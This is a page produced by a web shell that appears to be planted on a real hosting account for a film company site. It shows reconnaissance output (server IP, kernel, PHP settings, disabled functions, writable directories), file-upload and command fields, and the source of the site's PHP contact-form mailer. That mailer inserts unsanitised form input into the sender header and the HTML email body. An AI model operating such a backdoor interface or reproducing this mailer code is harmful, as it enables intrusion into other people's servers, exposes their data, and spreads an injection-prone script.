403Webshell
Server IP : 152.53.162.115  /  Your IP : 216.73.217.85
Web Server : Apache/2
System : Linux host 6.12.0-55.40.1.el10_0.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Oct 21 05:54:51 EDT 2025 x86_64
User : pbshosting ( 1005)
PHP Version : 8.3.30
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/pbshosting/domains/arunshekarfilms.com/private_html/mail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/pbshosting/domains/arunshekarfilms.com/private_html/mail/contact_mail.php
<?php

		session_start();


		ob_start();

			//create PHP Mailer object

			require("class.phpmailer.php");


			$mailer = (object) new PHPmailer();


			//setup PHPMailer


			$your_Email = "arunshekarfilms@gmail.com";



			$mailer->From =$_POST['email'];

              



			$mailer->FromName =$_POST['name'];  





			$mailer->AddAddress($your_Email);





			$mailer->Subject = "Contact Us";


			$mailer->Body = "<table cellpadding=5 cellspacing=5>

			<tr><td align=right><b>Name:&nbsp;</b></td><td>".$_POST['name']."</td></tr>

			<tr><td align=right><b>Subject:&nbsp;</b></td><td>".$_POST['subject']."</td></tr>

			<tr><td align=right><b>Email:&nbsp;</b></td><td>".$_POST['email']."</td></tr>
			<tr><td align=right><b>Contact Number:&nbsp;</b></td><td>".$_POST['mobile']."</td></tr>
			<td align=right valign=top><b>Message:&nbsp;</b></td><td style='text-align:justify;'>".$_POST['message']."</td></tr>

			

			</table>";

			//send mail as HTML

			$mailer->IsHTML(true);

			//set charset

			$mailer->CharSet = "utf-8";

			//set mailing method... mail, smtp or sendmail
			$mailer->Mailer = "mail";

			if ($mailer->Send())

        	{


				echo "1";

				

				}


        	else



        	{


				echo "0";





        	}







		ob_end_flush();





?>

Youez - 2016 - github.com/yon3zu
LinuXploit